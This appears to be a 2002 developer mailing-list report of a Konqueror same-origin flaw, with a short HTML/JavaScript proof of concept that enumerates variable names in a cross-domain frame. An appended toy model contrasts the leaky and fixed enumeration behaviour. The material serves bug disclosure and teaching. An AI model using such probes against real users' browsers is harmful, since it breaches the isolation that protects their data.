JS security and enumerating a Window
Koos Vriezen
koos.vriezen at xs4all.nl
Thu Oct 24 21:12:44 BST 2002
Hi,
While being a bit nervous about Dirk's hmm, I found that I can enumerate
a Window of another domain:
<HTML><HEAD><SCRIPT>
function doIt() {
    myframe1.document.open();
    myframe1.document.write("<html><body>");
    for (var i in frames[1]) {
        try {
            myframe1.document.write(i + "=" + frames[1][i] + "<br>");
        } catch (e) {
            myframe1.document.write(i + " error<br>");
        }
    }
    myframe1.document.write("</body></html>");
    myframe1.document.close();
}
</SCRIPT> </HEAD>
<FRAMESET ROWS="300,*" onLoad="doIt()">
    <FRAME NAME="myframe1" SRC="about:blank">
    <FRAME NAME="myframe2" SRC="http://localhost/~koos/test.html">
</FRAMESET></HTML>
where test.html is:
<html><head><script>
    var foo="bar";
</script></head>
<body></body></html>
Document opened with konq's filemanager, domain file:/.... As is myframe1.
And myframe2 has domain http://localhost/.
Does give a lot of 'WARNING: Javascript: access denied for current
frame...', but I can see JS variable name 'foo'. Don't see the value of it
though.
Koos
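
The behaviour reported in the message above, as an added toy model that is not part of the original post and is not Konqueror/KHTML code: a window wrapper that checks the origin on property reads but not on enumeration leaks names, while one that also filters the key list does not. The names makeWrapper, enumerate, CROSS_ORIGIN_SAFE and frameWindow, and the short allowlist, are assumptions of the model.

```javascript
// Added toy model, not Konqueror/KHTML code. makeWrapper, enumerate,
// CROSS_ORIGIN_SAFE and frameWindow are hypothetical names.
const CROSS_ORIGIN_SAFE = new Set(["closed", "length", "postMessage"]);

// strictKeys=false models the report: reads are denied, key names are not.
function makeWrapper(target, targetOrigin, callerOrigin, strictKeys) {
  const allowed = (key) =>
    targetOrigin === callerOrigin || CROSS_ORIGIN_SAFE.has(String(key));
  const has = (t, key) => Object.prototype.hasOwnProperty.call(t, key);
  return new Proxy(target, {
    get(t, key) {
      if (!allowed(key)) throw new Error("access denied for current frame");
      return t[key];
    },
    ownKeys(t) {
      const keys = Reflect.ownKeys(t);
      return strictKeys ? keys.filter(allowed) : keys;
    },
    getOwnPropertyDescriptor(t, key) {
      if (allowed(key)) return Reflect.getOwnPropertyDescriptor(t, key);
      // Denied key: hide it, or (leaky mode) admit it exists without a value.
      if (strictKeys || !has(t, key)) return undefined;
      return { configurable: true, enumerable: true };
    },
  });
}

// Same loop as doIt() in the message, collecting lines instead of writing them.
function enumerate(win) {
  const lines = [];
  for (const i in win) {
    try {
      lines.push(i + "=" + win[i]);
    } catch (e) {
      lines.push(i + " error");
    }
  }
  return lines;
}

// Constructed stand-in for the global object of test.html.
const frameWindow = { foo: "bar", closed: false };
const leaky = makeWrapper(frameWindow, "http://localhost", "file://", false);
const strict = makeWrapper(frameWindow, "http://localhost", "file://", true);
const sameSite = makeWrapper(frameWindow, "http://localhost", "http://localhost", true);

console.log(enumerate(leaky));    // name 'foo' visible, value denied
console.log(enumerate(strict));   // 'foo' not listed at all
console.log(enumerate(sameSite)); // same origin: full access
```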